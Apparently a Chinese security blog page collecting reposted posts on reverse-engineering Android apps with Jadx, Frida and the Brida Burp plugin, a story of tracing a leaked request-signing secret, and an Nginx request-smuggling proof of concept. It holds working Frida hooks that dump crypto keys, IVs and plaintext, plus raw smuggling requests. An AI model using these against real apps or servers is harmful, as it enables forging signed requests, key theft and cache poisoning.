灰产-如何破解请求验签（上）

May 27, 2024

灰产-如何破解请求验签（上）

前情提要

先来个前情提要：灰产-如何对APK修改后重签

在写那篇文章的我，是否会想到我竟然还有有关“灰产”的下文来写？而且就标题来说，还有分上下两篇！所以这4个月不到的时间我又经历了什么呢？

写在前面

以下都是情节模拟，并非具体情况，请细加甄别

让我们把时间拨回到年后。

年后回来一阵子，接到业务风控同学的反馈，我们有用户发现自己的账户被盗了，自己购买了不是自己的商品（不产生金额）并对这个商品统一匿名评价……

我第一反应卧槽哥们我们应用不是做了端校验，不同设备必须验证码登录，怎么连手机一起丢了才有后面能说漏洞导致账密泄漏的事？

后面通过网关日志、应用日志、接口日志等排查，发现这个用户的登录凭证（token）有从境外服务器请求服务的情况，可以基本确认是 token 的泄漏；

再和用户沟通以及进一步的深入排查，我们发现 token 的泄漏源于用户被钓鱼，这里细节不表；被社工得到的 token 会先从 ip 1 被收集并转发给 ip 2 进行购买请求与评论……

这里涉及到一个问题，我们的请求在各端做了验签，Sign 参数会根据不同端走不同的计算方式，想要更改 token 并发起购买请求，不重新计算 Sign是不可能通过校验的，只有两种可能：

我们的 Sign 计算方式被破解

我们的 Sign 计算方式可被任意调用

总而言之

总而言之，这个任务又落到我这里了= =

会议讨论对齐的时候，研发一致认为是在 H5 端的 Sign 计算方式太简单了，如何计算已经被破解，应该换上现在端上更安全的 Sign 计算就可以了！

直接破解一个计算方法理论上是不太容易的，我更在意的是是否是哪个地方泄漏了 Sign 的计算方法，或者在什么地方的计算代码可以被调用，直接入参入值然后得到结果。

但这里就要提到另一个事情了，研发不告诉你！

他们只表述这个好像比较简单就能破，但问他们怎么破的，不知道；问他们在哪里可能泄漏了，不知道：

“大概是从前端 JS 泄漏的？你看我们这里都做了混淆了，你看是不是就是这个位置，sign 关键词都命中了……”“可是为啥我调试/下断点没反应啊？”

后来嘛，在把钓鱼的口子堵了一下后，换上“更安全”的 Sign 计算方式后，喜闻乐见的钓鱼的口子也被绕过了，“更安全”的 Sign 计算也被破解了……

然后呢？

遭殃的还是我好吧，本来他们都认为可行的解决办法没用的时候，我就不得不花时间和精力来看看不在我 OKR 上的问题了

泄漏发现

算研发很配合安全工作，虽然告诉了我一个错误的泄漏位置，但起码提醒了我可能是 JS 就已经泄露了，没必要一来就去逆向找源码。

开始的思路还是去利用前端给到的 JS 复用：Burp Suite作为代理，复用目标站点的js代码处理指定的内容

后来发现 JSFlash 必须要能够指定调用代码函数才行，前端 JS 混淆了，指向不出来，直接分析不了

然后我就在前端登录页 Source - js 找到了 Sign 计算点，并且下断点步进调试看到了所有 Sign 的计算入参：

它端验证

在前端 JS 调试的过程中能看到有一个 secret 参数是不会暴露在 request 里的，其他端的如何获得？

Jadx 逆向反编译一下应用端，以 SIGN 为关键词，在源代码中发现了硬编码在其他端使用的 secret，以及使用的 Sign 最后加签算法：

写在后面

上篇就到这里，写的好像很简单，解过程也没遇到什么麻烦，但是还得说和大伙配合的还是不好，我还是认为不管是锻炼或者检验个人能力也好，工作任务忙不想接手深入这个事情也好，如果是以把事情完成的结论来说，相互配合是很重要的。

以旧 Sign 为例，大家说的好像每个人都知道这个是怎么生成的，但就是没人和你说，告诉的还是错误的位置，即使真的可能知道是怎么生成的不知道是在哪里泄露的，那信息汇通还是更重要的。研发完全可以告诉你“我猜是在前端 JS 泄漏的，位置是在这里，他的调用是这样的……”给你演示出来，如果真的在前端直接 Debug 下断点走一遍，就会知道一开始的位置告诉错了，并且一下就把泄漏点找出来了。

不会浪费双方的时间的。

参考引用

灰产-如何对APK修改后重签

Burp Suite作为代理，复用目标站点的js代码处理指定的内容

安卓逆向 - Frida Hook（抓包实践）

May 27, 2024

安卓逆向 - 基础入门教程

本文转自小馒头yy 并作补充

一、引言

上篇文章：安卓逆向 - 基础入门教程_小馒头yy的博客-CSDN博客介绍了Frida的安装、基本使用，今天我们来看看Frida常用Hook和基于Frida抓包实践。

二、Frida常用 Hook脚本

1、hook java.net.URL

function hook1() {
    var URL = Java.use('java.net.URL');
    URL.$init.overload('java.lang.String').implementation = function (a) {
        console.log('加密前：' + a)
        showStacks()
        this.$init(a)
    }
}

2、hook okhttp3 HttpUrl

function hookOkhttp3() {
    var Builder = Java.use('okhttp3.Request$Builder');
    Builder.url.overload('okhttp3.HttpUrl').implementation = function (a) {
        console.log('a: ' + a)
        var res = this.url(a);
        showStacks()
        console.log("res: " + res)
        return res;
    }
}

3、hook okhttp3 addHeader

function hook() {
    var Builder = Java.use("okhttp3.Request$Builder");
    Builder["addHeader"].implementation = function (str, str2) {
        console.log("key: " + str)
        console.log("val: " + str2)
        showStacks()
        var result = this["addHeader"](str, str2);
        console.log("result: " + result);
        return result;
    };
}

4、打印堆栈

function showStacks() {
    Java.perform(function () {
        console.log(Java.use("android.util.Log").getStackTraceString(Java.use("java.lang.Exception").$new()));
    });
}

5、hook Base64

function hookBase() {
    // Base64
    var Base64Class = Java.use("android.util.Base64");
    Base64Class.encodeToString.overload("[B", "int").implementation = function (a, b) {
        var rc = this.encodeToString(a, b);
        console.log(">>> Base64 " + rc);
        return rc;
    }
}

6、hook HashMap

function hookMap() {
    var Build = Java.use("java.util.HashMap");
    Build["put"].implementation = function (key, val) {
        console.log("key : " + key)
        console.log("val : " + val)
        return this.put(key, val)
    }
}

三、某麦网抓包实践

本篇以某麦网帖子详情接口，演示如何基于Frida hook抓包

1、安装某麦网8...apk

2、搭建Frida hook 环境，注入 hook java.net.URL脚本

3、点进帖子详情打印出如下堆栈，我们可以根据打印出的信息，跟栈分析该接口的请求头。

https://acs.m.taobao.com/gw/mtop.damai.wireless.discovery.detail.get/1.4/?source=10101&version=6000168&type=originaljson&data=%7B%22contentId%22%3A%2211088650%22%2C%22appType%22%3A%221%22%2C%22source%22%3A%2210101%22%2C%22osType%22%3A%222%22%2C%22pageSize%22%3A%2230%22%2C%22pageIndex%22%3A%221%22%2C%22version%22%3A%226000168%22%2C%22channel_from%22%3A%22damai_market%22%7D&appType=1&osType=2&channel_from=damai_market
java.lang.Exception
        at java.net.URL.<init>(Native Method)
        at tb.yy0.m(Taobao:1)
        at anet.channel.request.a.p(Taobao:2)
        at anet.channel.session.TnetSpdySession.w(Taobao:18)
        at anetwork.channel.unified.NetworkTask.sendRequest(Taobao:6)
        at anetwork.channel.unified.NetworkTask.run(Taobao:44)
        at anetwork.channel.unified.UnifiedRequestTask$a.proceed(Taobao:15)
        at com.taobao.orange.sync.NetworkInterceptor.intercept(Taobao:30)
        at anetwork.channel.unified.UnifiedRequestTask$a.proceed(Taobao:7)
        at anetwork.channel.unified.UnifiedRequestTask$3.run(Taobao:2)
        at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:428)
        at java.util.concurrent.FutureTask.run(FutureTask.java:237)
        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1133)
        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:607)
        at java.lang.Thread.run(Thread.java:761)

4、使用Jadx打开某麦网apk

从at tb.yy0.m(Taobao:1)跟栈分析

根据调用栈往上走，定位到如下位置，注意这行代码：

1	ALog.f("awcn.TnetSpdySession", "", aVar.n(), "request headers", aVar.g());

代码注释很清楚了 request headers，我们跟进 hook aVar.g() 这个方法

1
2
3

public Map<String, String> g() {
        return Collections.unmodifiableMap(this.f);
    }

hook之，对象输出可以使用 JSONObject转一下

1	var JSONObject = Java.use("com.alibaba.fastjson.JSONObject");

function hook6() {
    var JSONObject = Java.use("com.alibaba.fastjson.JSONObject");
    var a = Java.use("anet.channel.request.a");
    a["g"].implementation = function () {
        var result = this["g"]();
        console.log("result : " + JSONObject.toJSON(result).toString());
        return result;
    };
}

打印出如下内容：

请求 URL、请求方法这边都写得很清楚啦。

收工！

Android Frida Hook Reprint

安卓逆向 - 基础入门教程

May 27, 2024

安卓逆向 - 基础入门教程

本文转自小馒头yy 并作补充

一、引言

1、我们在采集app数据时，有些字段是加密的，如某麦网x-mini-wua x-sgext x-sign x-umt x-utdid等参数，这时候我们需要去分析加密字段的生成。本篇将以采集的角度讲解入门安卓逆向需要掌握的技能、工具。

2、安卓（Android）是一种基于Linux内核操作系统，架构图（了解即可）

3、安卓应用程序使用JAVA语言编写（重要），作为一名安卓逆向人员我们必须掌握Java语言基础（基本语法、类、接口、面向对象、网络类库、加密解密等等）

4、安卓逆向是对已经打包好的APP进行反编译，分析源码了解应用逻辑的一门技术，这一部分我们需要学习静态分析，动态分析。各种反编译工具（推荐 jadx），Frida Hook。

二、静态分析，学习jadx反编译

1、安装jadx，github地址： Releases · skylot/jadx · GitHub，下载 jadx-1.4.7.zip 解压即可。

2、调整jadx最大内存，打开bin目录下的 jadx-gui.bat文件，搜索DEFAULT_JVM_OPTS。

将 -XX:MaxRAMPercentage=70.0 修改成 -Xmx16g

3、jadx使用，打开apk，jadx会自动反编译apk

全局搜索：点击左上角的导航 - 文本搜索，输入关键字，并且下方可以筛选检索的位置

根据关键字定位到关键代码后，我们就可以进行分析加密参数的生成啦。

三、动态分析，Frida 初使用

1、安装 adb （Android Debug Bridge），通过命令行使用adb，对安卓设备进行操作

2、下载模拟器，我使用的逍遥模拟器（有Root好的真机更棒）

模拟器启动后，在命令行依次执行命令：
1
2
3
4
adb forward tcp:27043 tcp:27043
adb forward tcp:27042 tcp:27042
adb connect 127.0.0.1:21503
adb devices
再执行 adb shell，即可进入模拟器， #字符代表已 Root

3、安装Frida

本地直接使用 pip install frida 命令安装（需有Python环境）

模拟器（手机）端下载对应的Frida-server: Releases · frida/frida · GitHub

低版本安卓推荐下载：12.8.13，高版本安卓直接下载最新版

模拟器是 x86架构，真机是 arm架构，请下载对应的 frida-server

4、开启Hook，动态分析应用运行时数据

将frida-server传到手机 /data/local/tmp 目录，转到本地frida-server存放的目录，依次执行以下命令
1
2
3
4
5
adb push frida-server-12.8.13-android-x86 /data/local/tmp
adb shell
cd /data/local/tmp
chmod 777 frida-server-12.8.13-android-x86
./frida-server-12.8.13-android-x86
编写 hook脚本，使用js方式启动，本例为 hook URL的构造方法：
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
function hook1(){
    var URL = Java.use('java.net.URL');
    URL.$init.overload('java.lang.String').implementation= function(a){
            console.log('加密前：'+a)               
            console.log('                    ')
            this.$init(a)
    }
}
 
function main(){
    Java.perform(function(){
        hook();
    })
}
 
 
setImmediate(main);
开始 hook，注意高版本 frida不需要带 –no-pause
1
frida -U -l dm_hook.js -f cn.damai --no-pause
其中 dm_hook.js是 hook脚本的文件名，cn.damai是apk的包名。

滑动应用，正常打印出 url信息。

Android Frida Jadx Reprint

Burpsuite插件-Brida

May 27, 2024

Burpsuite插件-Brida

本文转自sam.li 并作补充

通过一道CTF题目来认识一下Frida
objection
前面两篇通过对Frida的了解，以及利用objection来分析，这篇来了解一下分析后实际利用，以及通过实现插件自动化的方式来利用。

Brida介绍

https://github.com/federicodotta/Brida

Brida components

官方使用文档翻译
时间记录，20230725；

测试版本：0.5

虽然说官方文档是最新的，但是使用文档的截图依旧跟新版本的插件不一致，然后能够查到的资料也是比较久的内容，不过大体功能是差不多，但是还是自己操作一遍后记录一下相关问题；

这里只记录自己测试的环境，其他环境参考官方文档；

Android

安装frida和其server，并启动具体可以参考通过一道CTF题目来认识一下Frida

配置brida

在配置之前先简单了解一下brida的UI及其功能；

1 主面板
这里包含所有brida工具和配置

Configurations

JS Editor

Hooks and functions

Graphical analysis

Graphical hooks

Custom plugins

Generate stubs

Debug export

2 brida按钮面板
Brida按钮面板由三个不同的部分组成：

顶部（前两行）是 Pyro4 服务器的状态（启动/停止）和应用程序的状态（hook状态）

（在两条黄线上方的按钮）在中间有一组固定在Brida所有选项卡上的按钮。这些按钮用于执行常规任务，如启动/停止 Pyro4 服务器、生成/附加/停止/分离应用程序（使用 frida-compile 编译）、重新加载 JS 文件、编译重新加载JS、分离所有hook、清除log等。

（黄线下）底部有一组按钮，取决于特定的Brida子选项卡

3 brida控制台
log输出

brida工具介绍

Configurations
配置界面

从上往下依次是

Pyro服务状态

应用状态

是否使用虚拟的python环境

python可以执行文件的路径

Pyro服务地址（默认）

Pyro端口（默认）

frida-complile可以执行文件的路径

是否使用旧版本的frida-complile，尽量使用10以下的版本，一开始用默认版本会出现问题，hook上了，但是总有奇怪的报错

包含所有Brida JS文件的文件夹，第一次需要先生成一下默认的JS文件

需要hook的应用名/PID，如果为应用名，则在连接的时候是点按钮面板的Spawn application，如果为PID，则Attach；

Frida连接方式

如果配置是远程连接frida，需要配置对应的地址和端口；

JS Editor

集成到Burp Suite中的JS编辑器，以便能够编辑Brida JS文件并直接从Burp Suite添加自定义hook和导出函数。编辑器具有JS语法突出显示。

Hooks and functions

此选项卡包括许多默认hooks和方法，可以通过按钮启用/执行。这些Frida脚本包括最新的Android和iOS平台的hook能力，以绕过和检查安全功能。

Graphical analysis

Graphical analysis

这里功能类似于objection的能力集成进来：
1
2
3
4
5
6
7
8
load tree = android hooking list classes //展示所有class 

搜索 = android hooking search methods [search_name] //在内存中所有已加载的方法中搜索包含特定关键词的方法
//但是这里Android的用起来会导致应用闪退，官方提了这个，只有iOS支持；

双击对应的class = android hooking watch class com.xxx.xxx //hook指定类, 会打印该类下的所以调用
右键Inspect = android hooking watch class_method com.xxx.xxx.methodName --dump-args --dump-backtrace --dump-return //hook指定类, 会打印该类下的所以调用
右键change return vule = android hooking set return_value com.xxx.xxx.methodName false //设置返回值
实际使用
参考：通过一道CTF题目来认识一下Frida

对函数进行打印，然后替换返回值，但是这里官方提供的返回值没有byte

Graphical hooks

管理之前hook的所有内容；

Custom plugins

强大的功能；

可以理解成自定义生成burpsuite插件，有四种可自定义插件类型；

IHttpListener：能让所有请求，通过正则匹配去替换/修改指定的内容，并让这个匹配到的内容通过frida构造的hook脚本处理（加解密、重新生成sign等）

IMessageEditorTab：将自定义选项卡添加到Burp Suite请求/响应窗格，以便能够使用Frida导出的函数解密/解码/处理请求/响应（或其中的一部分）（然后加密/编码/处理修改并替换原始请求/响应，如果有）

IContextMenu：将自定义上下文菜单选项添加到Burp Suite的右键菜单中，用于在请求和响应（或其中的一部分）上调用Frida导出的函数

JButton：添加调用/启用 Frida 导出函数的按钮

Generate stubs

如果内部自定义插件引擎无法解决复杂情况，则可以从外部Burp Suite插件使用Brida引擎。此选项卡生成 Java 和 Python 存根，可以复制并粘贴到外部插件中，以便允许 Burp Suite 和 Frida 使用 Brida 进行通信。

Debug export

此选项卡可用于在 Brida 插件中使用 Frida 导出的函数之前对其进行调试。为了使用 Brida 自定义插件（或使用 Brida 的外部插件），有必要将 Frida 代码放入一些由插件调用的 Frida 导出函数中。在此选项卡中，可以直接调用 Frida 导出，以便轻松调试。

使用问题记录

Windows环境

Spawn/Attach application时报错：entrypoint must be inside the project root
【移动安全】Frida + Burp -> Brida | APP加解密 | CN-SEC 中文网

把Frida的js文件放到burpsuite应用的目录下；

在Debug export中Run export是报错[frida.core.RPCException] unable to find method ‘test’
排查了很久，只找到了frida-compile版本过高这种情况，只能测试一下低版本是否会有问题，用npm在burpsuite应用的目录下执行npm install frida-compile@9.5.2，然后将安装的目录配置到frida-compile path中就能解决；

使用了低版本的frida-compile后报错java.io.IOException: Cannot run program
1
2
"C:\AAAA\agent\BurpSuiteCommunity\node_modules\.bin\frida-compile": 
CreateProcess error=193, %1 不是有效的 Win32 应用程序。
一开始配置没有带.cmd

UnicodeEncodeError: ‘gbk’ codec can’t encode
1
character '\u03f1' in position 49: illegal multibyte sequence**
刚好遇到一个反编译后用中文混淆的，这里用objection和python执行相关处理的时候就会报编码错误，在对应路径相关代码输出处加上utf-8编码输出就能解决；然后objection需要修改后重新编译；

源码解析

java调用python脚本

# -*- coding: utf-8 -*-
import frida
import codecs
import Pyro4
import sys

#reload(sys)   
#sys.setdefaultencoding('utf-8')

class Unbuffered(object):
   def __init__(self, stream):
       self.stream = stream
   def write(self, data):
       self.stream.write(data)
       self.stream.flush()
   def writelines(self, datas):
       self.stream.writelines(datas)
       self.stream.flush()
   def __getattr__(self, attr):
       return getattr(self.stream, attr)

@Pyro4.expose
class BridaServicePyro:
    def __init__(self, daemon):
        self.daemon = daemon

    def attach_application(self,pid,frida_script,device,host_port_device_id):

        self.frida_script = frida_script

        if pid.isnumeric():
            self.pid = int(pid)
        else:
            self.pid = pid

        if device == 'remote':
            self.device = frida.get_remote_device()
        elif device == 'usb':
            self.device = frida.get_usb_device()
        elif device == 'local':
            self.device = frida.get_local_device()
        elif device == 'device':
            self.device = frida.get_device(host_port_device_id)        
        else:
            self.device = frida.get_device_manager().add_remote_device(host_port_device_id)

        self.session = self.device.attach(self.pid)

        with codecs.open(self.frida_script, 'r', 'utf-8') as f:
            source = f.read()

        self.script = self.session.create_script(source)
        self.script.load()

        return    

    def spawn_application(self,application_id,frida_script,device,host_port_device_id):

        self.application_id = application_id
        self.frida_script = frida_script

        if device == 'remote':
            self.device = frida.get_remote_device()
        elif device == 'usb':
            self.device = frida.get_usb_device()
        elif device == 'local':
            self.device = frida.get_local_device()
        elif device == 'device':
            self.device = frida.get_device(host_port_device_id)        
        else:
            self.device = frida.get_device_manager().add_remote_device(host_port_device_id)

        self.pid = self.device.spawn([self.application_id])

        self.session = self.device.attach(self.pid)

        with codecs.open(self.frida_script, 'r', 'utf-8') as f:
            source = f.read()

        self.script = self.session.create_script(source)
        self.script.load()

        return

    def resume_application(self):

        self.device.resume(self.pid)

        return

    def reload_script(self):

        with codecs.open(self.frida_script, 'r', 'utf-8') as f:
            source = f.read()

        self.script = self.session.create_script(source)
        self.script.load()

        return

    def disconnect_application(self):

        self.device.kill(self.pid)
        return

    def detach_application(self):

        self.session.detach()
        return

    def callexportfunction(self, methodName, args):
        method_to_call = getattr(self.script.exports, methodName)

        # Take the Java list passed as argument and create a new variable list of argument
        # (necessary for bridge Python - Java, I think)
        s = []
        for i in args:
            s.append(i)

        return_value = method_to_call(*s)
        return return_value

    @Pyro4.oneway
    def shutdown(self):
        print('shutting down...')
        self.daemon.shutdown()

# Disable python buffering (cause issues when communicating with Java...)
sys.stdout = Unbuffered(sys.stdout)
sys.stderr = Unbuffered(sys.stderr)

host = sys.argv[1]
port = int(sys.argv[2])
daemon = Pyro4.Daemon(host=host,port=port)

#daemon = Pyro4.Daemon(host='127.0.0.1',port=9999)
bs = BridaServicePyro(daemon)
uri = daemon.register(bs,objectId='BridaServicePyro')

print("Ready.")
daemon.requestLoop()

Brida Burpsuite Hook Reprint

brida从0配置

May 27, 2024

brida从0配置

本文转自how=time 并作补充

前言

因为最近测的一个app，做了ssl pinning。查了一下资料，可以使用frida从内存中hook
住加密函数，用来解密传输信息。而brida是连接frida与burp的桥梁。使用了brida就可以正常使用burp抓取加密数据包。而网上关于brida的安装环境都不是最新的。brida原本默认是py2的，现在0.4版本已经支持py3的环境。接下来，我就带大家从0开始安装环境吧。

基础环境

系统 win10

python 3.8.3

java 13

夜神模拟器 android版本7.0

burp 2020.5 crack

node 14.4.0

基本上是一个全新的环境。adb，frida也都没有配置。问题不大。

设置与准备

1.brida下载安装

github上的release

此时两个status还未启动起来，那需要我们去配置frida的环境了。

或者burpsuite中BAPP store安装

2.adb设置

adb是连接模拟器和电脑的桥梁

adb的版本需要和nox的版本一致。我们可以直接使用everything去查找nox的adb，然后配置环境变量即可。

3.frida设置

frida分为server和client

客户端安装frida
这一步比较容易，pip安装即可

我们可以设置pip国内源来加快安装

1.进入c盘用户文件夹，新建pip的目录。pip目录下新建pip.ini的文件。

2.在pip.ini中添加下面代码：
1
2
3
4
5
6
[global]
timeout=6000
index-url=https://pypi.tuna.tsinghua.edu.cn/simple
trusted-host=pypi.tuna.tsinghua.edu.cn

# pip源同样适用python3和python2。(适用python2的firda下载包时可能会出现卡死，可以试试这个方法改善)
安装第三方库
1
2
3
pip install Pyro4
pip install frida-tools
npm install frida-compile #这个生成frida-conpile.cmd.burpsuite中需要填写frida compile path
服务端安装frida
查看模拟器cpu版本
1
getprop ro.product.cpu.abi
根据cpu版本选择frida-server

将下载好的文件解压并放入/data/local/tmp 模拟器中。在adb 进入模拟器，文件赋值777后启动server
1
2
3
4
5
adb push C:\Users\howti\Desktop\frida-server-12.9.7-android-x86 /data/local/tmp
adb shell
cd /data/local/tmp/
chmod  777 frida-server-12.9.7-android-x86
./frida-server-12.9.7-android-x86
android版本最好使用android7，不然会一些报错。

什么都不显示即可

将frida端口转发
1
2
adb forward tcp:27042 tcp:27042
adb forward tcp:27043 tcp:27043

4.burp设置

设置代理
设置brida

Python binary path: 就填入python3的路径（使用brida0.4就可以支持py3）

Pyro host: 默认

Pyro port: 默认

frida-compile: (frida-compile的二进制文件的路径)之前npm安装的包,里面有frida-compile.cmd .使用everything搜索frida 然后填入.

Frida JS files folder: 包含带有所有Frida和Brida钩子和导出文件的Frida工具JavaScript文件的文件夹的路径。我们可以使用默认文件夹

运行brida
我之前的环境找不到了，我用自己本机的环境结个图吧

获取 android包名

启动server 和Spawn application

正常启动，全绿。
配置完成
这里给出一件启动server的脚本（图中用的startfridaservice.py）
python3 startfridaserver.py 即可

链接：https://pan.baidu.com/s/11IdhpG8I5vMb1q33-7C4qg
提取码：46c0

Brida Hook Reprint

Frida java层自吐加密算法

May 24, 2024

Frida java层自吐加密算法

本文转自愧怍并作补充

代码

针对 java 层加密算法，能 hook 到 java 自带的加密函数库

const config = {
  showStacks: false,
  showDivider: true,
}

Java.perform(function () {
  // console.log('frida 已启动');
  function showStacks(name = '') {
    if (config.showStacks) {
      console.log(Java.use('android.util.Log').getStackTraceString(Java.use('java.lang.Throwable').$new(name)))
    }
  }

  function showDivider(name = '') {
    if (config.showDivider) {
      console.log(`==============================${name}==============================`)
    }
  }

  function showArguments() {
    console.log('arguments: ', ...arguments)
  }

  const ByteString = Java.use('com.android.okhttp.okio.ByteString')
  const Encode = {
    toBase64(tag, data) {
      console.log(tag + ' Base64: ', ByteString.of(data).base64())
      // console.log(tag + ' Base64: ', bytesToBase64(data));
    },
    toHex(tag, data) {
      console.log(tag + ' Hex: ', ByteString.of(data).hex())
      // console.log(tag + ' Hex: ', bytesToHex(data));
    },
    toUtf8(tag, data) {
      console.log(tag + ' Utf8: ', ByteString.of(data).utf8())
      // console.log(tag + ' Utf8: ', bytesToString(data));
    },
    toAll(tag, data) {
      Encode.toUtf8(tag, data)
      Encode.toHex(tag, data)
      Encode.toBase64(tag, data)
    },
    toResult(tag, data) {
      Encode.toHex(tag, data)
      Encode.toBase64(tag, data)
    },
  }

  const MessageDigest = Java.use('java.security.MessageDigest')
  {
    let overloads_update = MessageDigest.update.overloads
    for (const overload of overloads_update) {
      overload.implementation = function () {
        const algorithm = this.getAlgorithm()
        showDivider(algorithm)
        showStacks(algorithm)
        Encode.toAll(`${algorithm} update data`, arguments[0])
        return this.update(...arguments)
      }
    }

    let overloads_digest = MessageDigest.digest.overloads
    for (const overload of overloads_digest) {
      overload.implementation = function () {
        const algorithm = this.getAlgorithm()
        showDivider(algorithm)
        showStacks(algorithm)
        const result = this.digest(...arguments)
        if (arguments.length === 1) {
          Encode.toAll(`${algorithm} update data`, arguments[0])
        } else if (arguments.length === 3) {
          Encode.toAll(`${algorithm} update data`, arguments[0])
        }

        Encode.toResult(`${algorithm} digest result`, result)
        return result
      }
    }
  }

  const Mac = Java.use('javax.crypto.Mac')
  {
    Mac.init.overload('java.security.Key', 'java.security.spec.AlgorithmParameterSpec').implementation = function (key, AlgorithmParameterSpec) {
      return this.init(key, AlgorithmParameterSpec)
    }
    Mac.init.overload('java.security.Key').implementation = function (key) {
      const algorithm = this.getAlgorithm()
      showDivider(algorithm)
      showStacks(algorithm)
      const keyBytes = key.getEncoded()
      Encode.toAll(`${algorithm} init Key`, keyBytes)
      return this.init(...arguments)
    }

    // let overloads_update = Mac.update.overloads;
    // for (const overload of overloads_update) {
    //   overload.implementation = function () {
    //     const algorithm = this.getAlgorithm();
    //     showDivider(algorithm);
    //     showStacks(algorithm);
    //     Encode.toAll(`${algorithm} update data`, arguments[0]);
    //     return this.update(...arguments);
    //   };
    // }

    let overloads_doFinal = Mac.doFinal.overloads
    for (const overload of overloads_doFinal) {
      overload.implementation = function () {
        const algorithm = this.getAlgorithm()
        showDivider(algorithm)
        showStacks(algorithm)
        const result = this.doFinal(...arguments)
        if (arguments.length === 1) {
          Encode.toAll(`${algorithm} update data`, arguments[0])
        } else if (arguments.length === 3) {
          Encode.toAll(`${algorithm} update data`, arguments[0])
        }

        Encode.toResult(`${algorithm} doFinal result`, result)
        return result
      }
    }
  }

  const Cipher = Java.use('javax.crypto.Cipher')
  {
    let overloads_init = Cipher.init.overloads
    for (const overload of overloads_init) {
      overload.implementation = function () {
        const algorithm = this.getAlgorithm()
        showDivider(algorithm)
        showStacks(algorithm)

        if (arguments[0]) {
          const mode = arguments[0]
          console.log(`${algorithm} init mode`, mode)
        }

        if (arguments[1]) {
          const className = JSON.stringify(arguments[1])
          // 安卓10以上私钥是有可能输出不了的
          if (className.includes('OpenSSLRSAPrivateKey')) {
            // const keyBytes = arguments[1];
            // console.log(`${algorithm} init key`, keyBytes);
          } else {
            const keyBytes = arguments[1].getEncoded()
            Encode.toAll(`${algorithm} init key`, keyBytes)
          }
        }

        if (arguments[2]) {
          const className = JSON.stringify(arguments[2])
          if (className.includes('javax.crypto.spec.IvParameterSpec')) {
            const iv = Java.cast(arguments[2], Java.use('javax.crypto.spec.IvParameterSpec'))
            const ivBytes = iv.getIV()
            Encode.toAll(`${algorithm} init iv`, ivBytes)
          } else if (className.includes('java.security.SecureRandom')) {
          }
        }

        return this.init(...arguments)
      }
    }

    // let overloads_update = Cipher.update.overloads;
    // for (const overload of overloads_update) {
    //   overload.implementation = function () {
    //     const algorithm = this.getAlgorithm();
    //     showDivider(algorithm);
    //     showStacks(algorithm);
    //     Encode.toAll(`${algorithm} update data`, arguments[0]);
    //     return this.update(...arguments);
    //   };
    // }

    let overloads_doFinal = Cipher.doFinal.overloads
    for (const overload of overloads_doFinal) {
      overload.implementation = function () {
        const algorithm = this.getAlgorithm()
        showDivider(algorithm)
        showStacks(algorithm)
        const result = this.doFinal(...arguments)
        if (arguments.length === 1) {
          Encode.toAll(`${algorithm} update data`, arguments[0])
        } else if (arguments.length === 3) {
          Encode.toAll(`${algorithm} update data`, arguments[0])
        }

        Encode.toResult(`${algorithm} doFinal result`, result)
        return result
      }
    }
  }

  const Signature = Java.use('java.security.Signature')
  {
    let overloads_update = Signature.update.overloads
    for (const overload of overloads_update) {
      overload.implementation = function () {
        const algorithm = this.getAlgorithm()
        showDivider(algorithm)
        showStacks(algorithm)
        Encode.toAll(`${algorithm} update data`, arguments[0])
        return this.update(...arguments)
      }
    }

    let overloads_sign = Signature.sign.overloads
    for (const overload of overloads_sign) {
      overload.implementation = function () {
        const algorithm = this.getAlgorithm()
        showDivider(algorithm)
        showStacks(algorithm)
        const result = this.sign()
        Encode.toResult(`${algorithm} sign result`, result)
        return this.sign(...arguments)
      }
    }
  }
})

Exploit Frida Hook Reprint

（CVE-2020-12440）Nginx \<= 1.8.0 请求走私

May 21, 2024

（CVE-2020-12440）Nginx <= 1.8.0 请求走私

本文转自nosafer 并作补充

一、漏洞简介

Nginx 1.18.0及之前版本中存在安全漏洞。攻击者可利用该漏洞进行缓存投毒，劫持凭证或绕过安全保护。

二、漏洞影响

Nginx <= 1.8.0

三、复现过程

Request

GET /test.html HTTP/1.1
Host: www.0-sec.org
Content-Length: 2

GET /poc.html HTTP/1.1
Host: www.0-sec.org
Content-Length: 15

Response

HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 01 May 2020 18:28:44 GMT
Content-Type: text/html
Content-Length: 33
Last-Modified: Thu, 30 Apr 2020 14:36:32 GMT
Connection: keep-alive
ETag: "5eaae270-21"
Accept-Ranges: bytes

<html><h1>Test Page!</h1></html>
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 01 May 2020 18:28:44 GMT
Content-Type: text/html
Content-Length: 15
Last-Modified: Thu, 30 Apr 2020 14:35:41 GMT
Connection: keep-alive
ETag: "5eaae23d-f"
Accept-Ranges: bytes

NGINX PoC File

其他例子

Request（200 OK + 405 Method Not Allowed）

GET / HTTP/1.1
Host: www.0-sec.org
Content-Length: 4
Transfer-Encoding : chunked


46
TRACE / HTTP/1.1
Host:www.0-sec.org
Content-Length:15


kk
0s

Response（200 OK + 405 Method Not Allowed）

HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 21 Apr 2020 16:28:12 GMT
Content-Type: text/html
Content-Length: 612
Last-Modified: Tue, 21 Apr 2020 16:08:59 GMT
Connection: keep-alive
ETag: "5e9f1a9b-264"
Accept-Ranges: bytes


<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx!</title>
<style>
    body {
        width: 35em;
        margin: 0 auto;
        font-family: Tahoma, Verdana, Arial, sans-serif;
    }
</style>
</head>
<body>
<h1>Welcome to nginx!</h1>
<p>If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.</p>

<p>For online documentation and support please refer to
<a href="http://nginx.org/">nginx.org</a>.<br />
Commercial support is available at
<a href="http://nginx.com/">nginx.com</a>.</p>

<p><em>Thank you for using nginx.</em></p>
</body>
</html>
HTTP/1.1 405 Not Allowed
Server: nginx/1.18.0
Date: Tue, 21 Apr 2020 16:28:12 GMT
Content-Type: text/html
Content-Length: 157
Connection: close


<html>
<head><title>405 Not Allowed</title></head>
<body>
<center><h1>405 Not Allowed</h1></center>
<hr><center>nginx/1.18.0</center>
</body>
</html>

Request（200 OK + 404 Not Found）

GET / HTTP/1.1
Host: www.0-sec.org
Content-Length: 4
Transfer-Encoding : chunked

46
GET /404 HTTP/1.1
Host:www.0-sec.org
Content-Length:15

kk
0s

